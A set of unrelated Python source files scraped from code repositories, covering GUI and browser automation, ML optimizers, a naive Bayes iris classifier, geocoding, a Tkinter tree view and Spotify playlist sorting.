specmatch_io.read_standard_spectrum(nso_path)\n\n# lib_restr = lib.query('5540 < Teff < 5550')\n# ref_path = nso_path\n# run_script(lib_restr, ref_path)\n\n# 4500 < Teff < 6500\nlib_restr = lib.query('4500 < Teff < 6500')\nref_path = nso_path\nrun_script(lib_restr, ref_path)\n\n# 3700 < Teff < 4500\nlib_restr = lib.query('3700 < Teff <= 4500')\nref_path = '../lib/rj55.906_adj.fits'\nrun_script(lib_restr, ref_path)\n\n# Teff <= 3700\nlib_restr = lib.query('Teff <= 3700')\nref_path = '../lib/rj59.1926_adj.fits'\nrun_script(lib_restr, ref_path)\n\n# Teff >= 6500\nlib_restr = lib.query('Teff >= 6300')\nref_path = '../lib/rj187.479_adj.fits'\nrun_script(lib_restr, ref_path)","sub_path":"specmatchemp/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"49641883","text":"import pyautogui as pag\r\nimport time\r\nimport webbrowser\r\nimport os\r\nimport re\r\nimport os\r\ntime.sleep(2)\r\n##CHECK BEFORE YOU RUN\r\ndef open_youtube(its):\r\n Get_Ticker()\r\n url = \"https://studio.youtube.com/channel/UC2KSj189drlAWDWYiI8E2GA/videos/upload?d=ud&filter=%5B%5D&sort=%7B%22columnType%22%3A%22date%22%2C%22sortOrder%22%3A%22DESCENDING%22%7D\"\r\n for i in range(its):\r\n webbrowser.open_new_tab(url)\r\n\r\n\r\n#Sort of obsolete now\r\ndef loadYouTube(its):\r\n time.sleep(2)\r\n pag.keyDown('ctrl')\r\n for i in range(its):\r\n pag.click(x=1767, y=110)\r\n time.sleep(.1)\r\n pag.click(x=1767, y=147)\r\n time.sleep(.2)\r\n\r\n\r\ndef nextTab(its):\r\n for i in range(its):\r\n pag.click(x=1359, y=974)\r\n time.sleep(.1)\r\n pag.click(x=1359, y=974)\r\n time.sleep(.1)\r\n pag.hotkey('ctrl', 'tab')\r\n time.sleep(.2)\r\n\r\n\r\ndef schedule(its):\r\n for i in range(its):\r\n (624, 496)\r\n pag.click(x=625, y=500)\r\n #time.sleep(.1)\r\n #pag.click(x=601, y=389)\r\n time.sleep(.1)\r\n pag.hotkey('ctrl', 'tab')\r\n time.sleep(.2)\r\n\r\ndef publish(its):\r\n for i in range(its):\r\n pag.click(x=1338, y=974)\r\n time.sleep(5)\r\n\r\n pag.hotkey('ctrl', 'tab')\r\n time.sleep(.1)\r\ndef Get_Ticker():\r\n path, dirs, files = next(os.walk(\"C:/Users/Scott/Documents/Python Things/Earnings Calls/Todays Videos\"))\r\n for file in files:\r\n s = file\r\n m = re.search(r\"\\(([A-Za-z0-9_]+)\\)\", s)\r\n try:\r\n print(m.group(1))\r\n except:\r\n print(m)\r\n\r\npath, dirs, files = next(os.walk(\"C:/Users/Scott/Documents/Python Things/Earnings Calls/Todays Videos\"))\r\nits=len(files)\r\n#open_youtube(its)\r\nnextTab(its)\r\nschedule(its)\r\n#\r\npublish(its)\r\n\r\n#Andrew Adiberry\r\n#503 681 5405\r\n\r\n","sub_path":"Earnings Calls/next.py","file_name":"next.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"15103179","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport selenium.webdriver.support.ui as ui\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\nfrom common.exceptions import SiteErrorException\n\n\nclass Downloader(object):\n def __init__(self, url, driver='assets/chromedriver.exe'):\n self.chrome_driver_path = driver\n self.site_url = url\n self.ext_sht = Keys.CONTROL + \"m\"\n chop = webdriver.ChromeOptions()\n chop.add_extension('assets/Flash-Video-Downloader_v29.1.0.crx')\n self.driver = webdriver.Chrome(executable_path=self.chrome_driver_path, chrome_options=chop)\n self.wait = ui.WebDriverWait(self.driver, 10)\n self.counterWait = ui.WebDriverWait(self.driver, 35)\n # self.set_extension_shortcut()\n\n def set_extension_shortcut(self):\n self.driver.get('chrome://extensions-frame/')\n self.driver.find_element(By.XPATH, \"//a[@class='extension-commands-config']\").click()\n self.driver.find_element(By.XPATH, \"//span[@class='command-shortcut-text']\").send_keys(self.ext_sht)\n self.driver.find_element(By.ID, \"extension-commands-dismiss\").click()\n\n def connect(self):\n self.driver.get(self.site_url)\n\n def perform_search(self, search_text):\n search = self.driver.find_element(By.XPATH, \"//input[@name='term'][@type='text']\")\n search.send_keys(search_text)\n search = self.driver.find_element(By.XPATH, \"//form[@id='mainSearch']/div/span/button\")\n search.click()\n\n def select_season(self, season_num):\n season_link = self.driver.find_element(By.XPATH, \"//li[@data-season='{}']\".format(season_num))\n season_link.click()\n\n def select_episode(self, episode_num):\n episode_link = self.counterWait.until(lambda driver: driver.find_element(By.XPATH,\n \"//ul[@id='episode']/li[@data-episode='{}']\".format(\n episode_num)))\n episode_link = self.driver.find_element(By.XPATH,\n \"//ul[@id='episode']/li[@data-episode='{}']\".format(episode_num))\n episode_link.click()\n\n timer = self.wait.until(lambda driver: driver.find_element(By.XPATH, \"//p[@id='waitTime']\"))\n timer.location_once_scrolled_into_view\n # footer = self.driver.find_element_by_tag_name('footer')\n # footer.location_once_scrolled_into_view\n # actions = ActionChains(self.driver)\n # actions.move_to_element(footer)\n # p id =waitTime\n\n def activate_extension(self):\n self.driver.find_element(By.TAG_NAME, \"body\").send_keys(self.ext_sht)\n\n def download_using_flash(self):\n try:\n p_button = self.counterWait.until(lambda driver: driver.find_element(By.XPATH,\n \"//button[@id='proceed']\"))\n try:\n error = self.counterWait.until(lambda driver: driver.find_element(By.XPATH,\n \"//div[@class='err']\"))\n if 'שגיאה' in error.text:\n raise SiteErrorException\n except NoSuchElementException as e:\n print(\"no such element {}\".format(e.msg))\n # EC.\n # self.wait.\n self.activate_extension()\n\n except TimeoutException as e:\n print(\"timeout exception\")\n error = self.driver.find_element(By.XPATH, \"//div[@class='err']\")\n if error:\n raise SiteErrorException()\n except SiteErrorException as e:\n raise e\n\n def refresh(self):\n self.driver.refresh()\n\n def close(self):\n self.driver.close()\n\n def switch_tabs(self):\n self.driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + Keys.TAB)\n\n def open_new_tab(self, url):\n self.driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 't')\n self.driver.get(url)\n\n def close_current_tab(self):\n self.driver.find_element_by_tag_name('html').send_keys(Keys.CONTROL + 'w')\n","sub_path":"download/Downloader.py","file_name":"Downloader.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"77014154","text":"import cupy as np\n\n\ndef set_optimizer(opt, lr):\n if opt == \"SGD\":\n return SGD(lr = lr)\n if opt == \"Adam\":\n return Adam(lr = lr)\n if opt == \"AdaBound\":\n return AdaBound(lr = lr, final_lr = 0.1)\n else:\n print(\"{} is not defined.\".format(opt))\n return None\n \n\nclass SGD:\n def __init__(self, lr = 0.1):\n self.lr = lr\n\n def update(self, params, grads):\n for key in params.keys():\n params[key] -= self.lr * grads[key]\n\n\nclass Adam:\n def __init__(self, lr):\n self.lr = lr\n self.beta1 = 0.9\n self.beta2 = 0.999\n self.iters = 0\n self.m = None\n self.v = None\n self.eps = 1e-7\n\n def update(self, params, grads):\n if self.m is None and self.v is None:\n self.m = {}\n self.v = {}\n for key, val in params.items():\n self.m[key] = np.zeros_like(val)\n self.v[key] = np.zeros_like(val)\n self.iters += 1\n lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iters) / (1.0 - self.beta1**self.iters)\n for key in params.keys():\n self.m[key] += (1.0 - self.beta1) * (grads[key] - self.m[key])\n self.v[key] += (1.0 - self.beta2) * (grads[key]**2 - self.v[key])\n params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + self.eps)\n\n\nclass AdaBound:\n def __init__(self, lr, final_lr):\n self.lr = lr\n self.final_lr = final_lr\n self.beta1 = 0.9\n self.beta2 = 0.999\n self.iters = 0\n self.m = None\n self.v = None\n self.eps = 1e-7\n\n def update(self, params, grads):\n if self.m is None and self.v is None:\n self.m = {}\n self.v = {}\n for key, val in params.items():\n self.m[key] = np.zeros_like(val)\n self.v[key] = np.zeros_like(val)\n self.iters += 1\n lower_lr = self.final_lr * (1.0 - 1.0 / ((1.0-self.beta2) * self.iters + 1.0))\n higher_lr = self.final_lr * (1.0 + 1.0 / ((1.0-self.beta2) * self.iters))\n for key in params.keys():\n self.m[key] += (1.0 - self.beta1) * (grads[key] - self.m[key])\n self.v[key] += (1.0 - self.beta2) * (grads[key]**2 - self.v[key])\n lr_t = np.clip(self.lr / (np.sqrt(self.v[key]) + self.eps), lower_lr, higher_lr) / np.sqrt(self.iters)\n params[key] -= lr_t * self.m[key]\n","sub_path":"optimizer_gpu.py","file_name":"optimizer_gpu.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"491699478","text":"from __future__ import (\n absolute_import,\n print_function,\n)\n\nfrom __future__ import unicode_literals\nimport os\nfrom corehq.form_processor.interfaces.dbaccessors import CaseAccessors\nfrom corehq.apps.es.case_search import CaseSearchES\nfrom corehq.apps.es import queries\n\nfrom custom.enikshay.case_utils import (\n CASE_TYPE_EPISODE,\n CASE_TYPE_PERSON,\n get_all_occurrence_cases_from_person,\n)\nfrom custom.enikshay.const import ENROLLED_IN_PRIVATE\nfrom custom.enikshay.management.commands.base_data_dump import BaseDataDump\nfrom corehq.elastic import ES_EXPORT_INSTANCE\n\nDOMAIN = \"enikshay\"\n\n\nclass Command(BaseDataDump):\n \"\"\" data dumps for person cases\n\n https://docs.google.com/spreadsheets/d/1OPp0oFlizDnIyrn7Eiv11vUp8IBmc73hES7qqT-mKKA/edit#gid=1039030624\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(Command, self).__init__(*args, **kwargs)\n self.case_type = CASE_TYPE_PERSON\n self.input_file_name = os.path.join(os.path.dirname(__file__),\n 'data_dumps_person_case.csv')\n\n TASK_NAME = \"data_dumps_person_case\"\n INPUT_FILE_NAME = ('%s/data_dumps_person_case.csv' %\n os.path.dirname(os.path.realpath(__file__)))\n\n def get_last_episode(self, case):\n self.context['last_episode'] = (\n self.context.get('last_episode') or\n get_last_episode(case)\n )\n if not self.context['last_episode']:\n return Exception(\"could not find last episode for person %s\" % case.case_id)\n return self.context['last_episode']\n\n def get_custom_value(self, column_name, case):\n if column_name == 'Status':\n if case.closed:\n return \"closed\"\n elif case.owner_id == \"_invalid_\":\n return \"removed\"\n elif case.owner_id == '_archive_':\n return \"archived\"\n else:\n return \"active\"\n return Exception(\"unknown custom column %s\" % column_name)\n\n def get_case_reference_value(self, case_reference, case, calculation):\n if case_reference == 'last_episode':\n try:\n return self.get_last_episode(case).get_case_property(calculation)\n except Exception as e:\n return str(e)\n return Exception(\"unknown case reference %s\" % case_reference)\n\n def get_case_ids(self, case_type):\n \"\"\"\n All open and closed person cases with person.dataset = 'real' and person.enrolled_in_private != 'true'\n \"\"\"\n return (CaseSearchES(es_instance_alias=ES_EXPORT_INSTANCE)\n .domain(DOMAIN)\n .case_type(case_type)\n .case_property_query(ENROLLED_IN_PRIVATE, 'true', clause=queries.MUST_NOT)\n .case_property_query(\"dataset\", 'real')\n .get_ids()[0:10])\n\n\ndef get_recently_closed_case(person_case, all_cases):\n recently_closed_case = None\n recently_closed_time = None\n for case in all_cases:\n case_closed_time = case.closed_on\n if case_closed_time:\n if recently_closed_time is None:\n recently_closed_time = case_closed_time\n recently_closed_case = case\n elif recently_closed_time and recently_closed_time < case_closed_time:\n recently_closed_time = case_closed_time\n recently_closed_case = case\n elif recently_closed_time and recently_closed_time == case_closed_time:\n raise Exception(\"This looks like a super edge case that can be looked at. \"\n \"Two episodes closed at the same time. Case id: {case_id}\"\n .format(case_id=case.case_id))\n\n if not recently_closed_case:\n return Exception(\"Could not find recently closed episode case for person %s\" %\n person_case.case_id)\n\n return recently_closed_case\n\n\ndef get_all_episode_cases_from_person(domain, person_case_id):\n occurrence_cases = get_all_occurrence_cases_from_person(domain, person_case_id)\n return [\n case for case in CaseAccessors(domain).get_reverse_indexed_cases(\n [c.case_id for c in occurrence_cases], case_types=[CASE_TYPE_EPISODE])\n ]\n\n\ndef get_last_episode(person_case):\n \"\"\"\n For all episode cases under the person (the host of the host of the episode is the primary person case)\n If count(open episode cases with episode.is_active = 'yes') > 1, report error\n If count(open episode cases with episode.is_active = 'yes') = 1, pick this case\n If count(open episode cases with episode.is_active = 'yes') = 0:\n If count(open episode cases) > 0, report error\n Else, pick the episode with the latest episode.closed_date\n \"\"\"\n episode_cases = get_all_episode_cases_from_person(person_case.domain, person_case.case_id)\n open_episode_cases = [\n episode_case for episode_case in episode_cases\n if not episode_case.closed\n ]\n active_open_episode_cases = [\n episode_case for episode_case in open_episode_cases\n if episode_case.get_case_property('is_active') == 'yes'\n ]\n if len(active_open_episode_cases) > 1:\n raise Exception(\"Multiple active open episode cases found for %s\" % person_case.case_id)\n elif len(active_open_episode_cases) == 1:\n return active_open_episode_cases[0]\n elif len(open_episode_cases) > 0:\n raise Exception(\"Open inactive episode cases found for %s\" % person_case.case_id)\n else:\n return get_recently_closed_case(person_case, episode_cases)\n","sub_path":"custom/enikshay/management/commands/data_dumps_person_case.py","file_name":"data_dumps_person_case.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"378013012","text":"from geopy.geocoders import Nominatim\n\n\ndef parse_location_from_address():\n geo_locator = Nominatim(user_agent=\"specify_your_app_name_here\")\n location = geo_locator.geocode(\"175 5th Avenue NYC\")\n # print(location.address)\n # print((location.latitude, location.longitude))\n print(location.raw)\n\n\ndef get_address_from_latlng():\n geo_locator = Nominatim(user_agent=\"specify_your_app_name_here\")\n location = geo_locator.reverse(\"23.8185045,90.3555421\", language=\"en\")\n print(location.raw)\n for k, v in location.raw.items():\n print(f\"{k}: {v} \")\n\n print(location.address)\n\n\nget_address_from_latlng()\n","sub_path":"geo_coder.py","file_name":"geo_coder.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"591686092","text":"# -*- co ding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 31 16:32:51 2014\n\n@author: Kshitij\n\"\"\"\nimport numpy as np\nimport math\nF_sl = []\nF_sw = []\nF_pl = []\nF_pw = []\n\nft = {\"sl\":0, \"sw\":1, \"pl\":2, \"pw\":3}\n\nbin_info = {0:[3.6/4, 4, 4.3], 1:[2.4/4, 4, 2.0], 2:[5.9/5, 5, 1], 3:[2.4/3, 3, 0.1]}\npercentage = 40\ntraining = {}\ntest = {}\nprior = {0:0, 1:0, 2:0}\n\ndef main():\n\n #variables \n global F_pl\n global F_sl\n global F_pw\n global F_sw\n data = []\n misclass = 0\n #read data from file\n f = open(\"iris.txt\")\n for line in f:\n y = line.split()\n \n data.append(y)\n \n #randomly select data for training and testing\n pickData(data, percentage)\n \n #calculates P(C_1), P(C_2), P(C_3) from the training data\n calcPrior(percentage/100*len(data))\n #print(prior)\n \n #Initialize Feature Histograms (F1, F2, F3, F4) with given # of bins \n F_pl = initFMat(F_pl, bin_info[ft[\"pl\"]][1])\n F_pw = initFMat(F_pw, bin_info[ft[\"pw\"]][1]) \n F_sl = initFMat(F_sl, bin_info[ft[\"sl\"]][1])\n F_sw = initFMat(F_sw, bin_info[ft[\"sw\"]][1])\n \n #Fill up the historgrams\n F_pl = fillBin(F_pl, training, ft[\"pl\"], bin_info[ft[\"pl\"]][0], bin_info[ft[\"pl\"]][1])\n print(\"Hist for Petal_length: \",F_pl)\n F_pw = fillBin(F_pw, training, ft[\"pw\"], bin_info[ft[\"pw\"]][0], bin_info[ft[\"pw\"]][1])\n print(\"Hist for Petal_width: \",F_pw)\n F_sl = fillBin(F_sl, training, ft[\"sl\"], bin_info[ft[\"sl\"]][0], bin_info[ft[\"sl\"]][1])\n print(\"Hist for sepal_length: \",F_sl)\n F_sw = fillBin(F_sw, training, ft[\"sw\"], bin_info[ft[\"sw\"]][0], bin_info[ft[\"sw\"]][1]) \n print(\"Hist for sepal_width: \",F_sw)\n\n #testing bayes\n for key, value in test.items():\n print(\"key \",key)\n \n if naiveBayes(value):\n print(\"correctly classified!\")\n else:\n misclass+=1\n \n print(\"misclass: \", 100*misclass/len(test))\n\ndef initFMat(F, div):\n F = [[0 for i in range(div)] for j in range(3)]\n return F\n\n\ndef naiveBayes(test_tuple):\n #print(\"test_tuple val for sw: \", test_tuple[ft[\"sw\"]])\n # class 1\n # Feature 1\n swbin = int((float(test_tuple[ft[\"sw\"]])-bin_info[ft[\"sw\"]][2]-0.001)/bin_info[ft[\"sw\"]][0])\n #print(\"this tuple sits here for feature sw: \", swbin) \n slbin = int((float(test_tuple[ft[\"sl\"]])-bin_info[ft[\"sl\"]][2]-0.001)/bin_info[ft[\"sl\"]][0])\n #print(\"this tuple sits here for feature sl: \", slbin)\n #print(\"min pl\",bin_info[ft[\"pl\"]][2])\n #print(\"bin width\", bin_info[ft[\"pl\"]][0])\n plbin = int((float(test_tuple[ft[\"pl\"]])-bin_info[ft[\"pl\"]][2]-0.001)/bin_info[ft[\"pl\"]][0])\n #print(\"this tuple sits here for feature pl: \", plbin)\n pwbin = int((float(test_tuple[ft[\"pw\"]])-bin_info[ft[\"pw\"]][2]-0.001)/bin_info[ft[\"pw\"]][0])\n #print(\"this tuple sits here for feature pw: \", pwbin)\n \n p_cl0 = prior[0]*F_sw[0][swbin]*F_sl[0][slbin]*F_pl[0][plbin]*F_pw[0][pwbin]\n #print(\"F_sw: \", F_sw)\n #print(\"F_pl: \", F_pl)\n #print(\"F_pw: \", F_pw)\n #print(\"F_sl: \", F_sl)\n print(\"probability of being in class 0: \", p_cl0)\n \n p_cl1 = prior[1]*F_sw[1][swbin]*F_sl[1][slbin]*F_pl[1][plbin]*F_pw[1][pwbin]\n print(\"probability of being in class 1: \", p_cl1) \n \n p_cl2 = prior[2]*F_sw[2][swbin]*F_sl[1][slbin]*F_pl[2][plbin]*F_pw[2][pwbin]\n print(\"probability of being in class 2: \", p_cl2)\n\n cls = [p_cl0, p_cl1, p_cl2].index(max([p_cl0, p_cl1, p_cl2]))\n print(\"predicted class: \", cls)\n\n print(\"actual class: \", test_tuple[4]) \n \n if cls == int(test_tuple[4]):\n return True\n else:\n return False\n\ndef fillBin(F, data, fid, size, div):\n feature_data = []\n for key, value in data.items():\n feature_data.append([value[fid], value[4]])\n feature_data.sort() \n \n #print(\"F NEW!!:\",F)\n binC = [] \n for i in range(div):\n #binC.append((i+1)*size+bin_info[fid][2]*10)\n temp = (i+1)*size+bin_info[fid][2]\n ntemp = math.ceil(temp*10)/10\n binC.append(ntemp)\n \n print(\"binC:\",binC)\n binIn = 0 \n \n for x in feature_data:\n if (float(x[0])>binC[binIn]):\n binIn+=1\n #print(\"x[0]:\", x[0])\n #print(\"x[1]: \", x[1])\n #print(\"binIn: \", binIn)\n F[int(x[1])][binIn]+=1\n \n tot = [0 for j in range(3)]\n \n for j in range(3):\n for i in range(div):\n tot[j]+=F[j][i]\n\n #print(\"tot: \",tot) \n #print(\"F: \",F)\n for j in range(3):\n for i in range(div):\n if tot[j]==0:\n tot[j]=1\n F[j][i] = F[j][i]/tot[j]\n \n return F\n \ndef calcPrior(total):\n for i in training:\n #print(training[i][4])\n if training[i][4] == '0':\n prior[0]+=1\n elif training[i][4] == '1':\n prior[1]+=1\n else:\n prior[2]+=1\n for i in prior:\n prior[i]=prior[i]/total\n\ndef pickData(data, perc):\n \n global training \n global test\n x=0\n #print(\"sizes:\", round(perc/100*len(data)))\n while x < (round(perc/100*len(data))):\n x+=1\n temp = np.random.random_integers(0, len(data)-1)\n if temp not in training:\n training[temp] = data[temp]\n else:\n x-=1\n \n #print(len(training))\n for y in range(len(data)):\n if y not in training:\n test[y] = data[y]\n \n\nif __name__ == \"__main__\":\n main() ","sub_path":"randomDataPicker.py","file_name":"randomDataPicker.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"121362815","text":"#!/usr/bin/env python2\n# -*- coding: utf8\n\n\"\"\"\tdemo for MVC with ttk.TreeView and ttk styling.\n\"\"\"\n\nfrom __future__ import print_function\nfrom pprint import pprint\n\ntry:\n import tkinter as tk\nexcept Exception as ex:\n import Tkinter as tk\n\nimport ttk\n\nfrom node import node\n \nclass tree_model(object):\n \"\"\"\n \"\"\"\n \n def __init__(self, config_file=None):\n \"\"\"\n \"\"\" \n self.root = None\n if config_file is not None:\n self.load_config(config_file)\n \n def load_config(self, config_file):\n \"\"\"\n \"\"\"\n self.root = node.tree_from_nested_list(node.sample_tree)\n \n#s = ttk.Style()\n#s.configure('My.TFrame', background='red')\n \nclass tree_view(ttk.Frame):\n \"\"\"\n \"\"\"\n\n @staticmethod\n def object_to_id(object):\n return str(object).replace(' ','_')\n \n def __init__(self, master, presenter):\n \"\"\"\n \"\"\"\n ttk.Frame.__init__(self, master) #, style='My.TFrame')\n\n self.popup = None\n \n self.sb = ttk.Scrollbar(self)\n self.sb.pack(side=tk.RIGHT, expand=tk.NO, fill=tk.Y)\n self.tv = ttk.Treeview(self, columns=('v1','v2','v3'),\n displaycolumns=('#all'),\n selectmode='browse',\n show='tree headings',\n yscrollcommand=self.sb.set\n )\n self.tv.pack(side=tk.LEFT, expand=tk.YES, fill=tk.BOTH)\n self.tv.heading('#0',text='Element')\n self.sb.configure(command=self.tv.yview)\n \n self.presenter = presenter\n \n self.tv.bind('<>', self.selection)\n self.tv.bind('', self.context_menu)\n\n def selection(self, event):\n self.presenter.selection(self.rmap[self.tv.selection()[0]])\n\n def update_view(self, data_list):\n \"\"\"\n \"\"\"\n self.map = {None:''} # object -> menu_id\n if data_list is not None:\n for d in data_list:\n try:\n pid = self.map[d.parent]\n new_id = self.tv.insert(pid, index='end', text=unicode(d.value), value=(unicode(d.value), unicode(d.value), 'a titi'), open=True)\n self.map[d] = new_id \n except Exception as ex:\n print('-- Exception while inserting entry :',ex)\n print('map is', self.map)\n print('pid is', pid)\n self.rmap = {}\n for x in self.map.keys():\n self.rmap[self.map[x]] = x # menu_id -> object, useful when selecting\n\n def context_menu(self, event):\n item_id = self.tv.identify('item',event.x,event.y)\n if item_id=='':\n return\n #print('treeview item', item_id)\n self.tv.selection_set(item_id)\n obj = self.rmap[item_id]\n # create a popup menu from a menu structure\n menu_title, menu_description = obj.menu_structure()\n self.popup = self.build_popup(menu_description, menu_title=menu_title)\n self.popup.tk_popup(event.x_root, event.y_root)\n \n def build_popup(self, menu_description, menu_title=None, parent=None):\n if parent is None:\n parent = self\n menu = tk.Menu(parent, tearoff=0, title=menu_title) # tearoff=1 implies handling menu changes on other tree nodes changes\n if menu_title is not None:\n menu.add_command(label=' '+menu_title, bitmap='gray75', compound='left', command=None, background='black', foreground='white')\n for entry in menu_description:\n title, action = entry\n if isinstance(action, list):\n submenu = self.build_popup(action, parent=menu)\n menu.add_cascade(label=title, menu=submenu)\n elif title is None:\n menu.add_separator()\n elif action is None: # to be removed, was title\n #menu.add_command(label=' '+title, bitmap='gray25', compound='left', state='disabled', background='black', foreground='white')\n menu.add_command(label=' '+title, background='black', foreground='white')\n else:\n menu.add_command(label=title, command=action)\n \n return menu\n \n \n def insert_item(self, item):\n \"\"\" \n * The following item options may be specified for items in the insert and item widget commands:\n text The textual label to display for the item.\n image A Tk Image, displayed to the left of the label.\n values The list of values associated with the item.\n Each item should have the same number of values as the widget option columns. \n If there are fewer values than columns, the remaining values are assumed empty. If there are more values than columns, the extra values are ignored.\n open True/False value indicating whether the item’s children should be displayed or hidden.\n tags A list of tags associated with this item.\n \n * The following options may be specified on tags:\n foreground Specifies the text foreground color.\n background Specifies the cell or item background color.\n font Specifies the font to use when drawing text.\n image Specifies the item image, in case the item’s image option is empty.\n\n The Treeview widget generates the following virtual events:\n <> Generated whenever the selection changes.\n <> Generated just before settings the focus item to open=True.\n <> Generated just after setting the focus item to open=False.\n \n parent is the item ID of the parent item, or the empty string to create a new top-level item. \n index is an integer, or the value “end”, \n specifying where in the list of parent’s children to insert the new item. \n If index is less than or equal to zero, the new node is inserted at the beginning; \n if index is greater than or equal to the current number of children, it is inserted at the end. \n If iid is specified, it is used as the item identifier; iid must not already exist in the tree. Otherwise, a new unique identifier is generated.\n \"\"\"\n\nclass tree_presenter(object):\n \"\"\"\n \"\"\"\n \n def __init__(self, model, on_select):\n \"\"\"\n \"\"\"\n self.model = model\n print('model=', model)\n self.views = []\n self.on_select = on_select\n \n def new_ui_view(self, master):\n \"\"\"\n \"\"\"\n new_view = tree_view(master, self)\n self.views.append(new_view)\n new_view.update_view(self.model.root.all_subtree_nodes())\n return new_view\n \n def update_view(self):\n \"\"\"\n \"\"\"\n for v in self.views:\n v.update_view(self.model.root.all_subtree_nodes())\n \n def selection(self, object):\n \"\"\"\n \"\"\"\n #print(event, event.widget)\n #w = event.widget\n #print(w.focus(), w.selection())\n print('selected object', object)\n\n #def right_click(self, event):\n # w = event.widget\n\n def context_menu(self, event):\n print('right click')\n w = event.widget\n print(w.focus(), w.selection())\n\n\nclass app_window(tk.Frame):\n\n EXIT_OK = 0\n EXIT_FAIL_INIT = 1\n EXIT_UNEXPECTED = 2\n\n def __init__(self, master, model):\n \"\"\"\n \"\"\"\n self.exit_status = 2 # not initialized yet\n \n tk.Frame.__init__(self, master)\n\n self.tp = tree_presenter(model, self.selection)\n \n self.t = self.tp.new_ui_view(self)\n self.t.pack(expand=tk.YES, fill=tk.BOTH)\n \n tk.Button(self, text='Quit', command=self.event_quit_request).pack()\n \n def event_quit_request(self, optional_code=None):\n \"\"\"\n \"\"\" \n print(optional_code)\n self.exit_status = app_window.EXIT_OK\n self.master.destroy()\n\n def selection(self, event):\n \"\"\"\n \"\"\"\n print(event)\n print(self.t.focus(), self.t.selection())\n\n\n#\n#\n#\n \nif __name__ == '__main__':\n\n try:\n root = tk.Tk()\n except Exception as ex:\n print(ex)\n exit(app_window.EXIT_FAIL_INIT)\n try:\n data = tree_model('dummy')\n print('data=', data)\n aw = app_window(root, data)\n except Exception as ex:\n print(ex)\n exit(app_window.EXIT_FAIL_INIT)\n else:\n aw.pack(expand=tk.YES, fill=tk.BOTH)\n root.protocol('WM_DELETE_WINDOW', aw.event_quit_request)\n try:\n root.mainloop()\n except Exception as ex:\n print(ex)\n print(aw.exit_status)\n exit(aw.exit_status)\n ","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":8083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"237768678","text":"from os import path\nimport sys\nimport json\n\n# Add the parent directory to the sys.path so allow importing modules\n# in the ../lib directory\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\nfrom lib.spotify import Spotify\nfrom lib.database import Database\n\ndef main():\n spotify = Spotify(user_id = 'therumbler')\n playlist_all_id = '7kyx2nzrGrCmjfdcMA5h4S'\n playlist_all = spotify.get_all('users/therumbler/playlists/{}/tracks'.format(playlist_all_id))\n\n playlist_instrumental_id = '65BFOkaLoWIRF2jePfOSl8'\n playlist_instrumental = spotify.get_all('users/therumbler/playlists/{}/tracks'.format(playlist_instrumental_id))\n playlist_vocals_id = '4uWb4JEKt4Z1cclJF7tktk'\n playlist_vocals = spotify.get_all('users/therumbler/playlists/{}/tracks'.format(playlist_vocals_id))\n track = spotify.get('audio-features/3OhepZ0HXPdhxVw5XbejdV')\n\n print(json.dumps(playlist_all['total'], indent =2))\n for item in playlist_all['items']:\n track = item['track']\n #print json.dumps(track, indent = 2)\n audio_features = spotify.get('audio-features/{}'.format(track['id']))\n\n playlist_id = None\n if audio_features['instrumentalness'] > 0.75:\n # add to intrumental playlist\n if track['id'] not in [item['track']['id'] for item in playlist_instrumental['items']]:\n playlist_id = playlist_instrumental_id\n if audio_features['instrumentalness'] < 0.25:\n\n # add to vocal playlist\n if track['id'] not in [item['track']['id'] for item in playlist_vocals['items']]:\n playlist_id = playlist_vocals_id\n\n if playlist_id:\n\n print(\"about to add track {} to playlist {}\".format(track['id'], playlist_id))\n #spotify.post('users/therumbler/playlists/{}/tracks/?uris={}'.format(playlist_id, track['uri']))\n else:\n print(\"track {} has an instrumentalness of {}\".format(track['id'], audio_features['instrumentalness']))\n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/playlist_update.py","file_name":"playlist_update.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
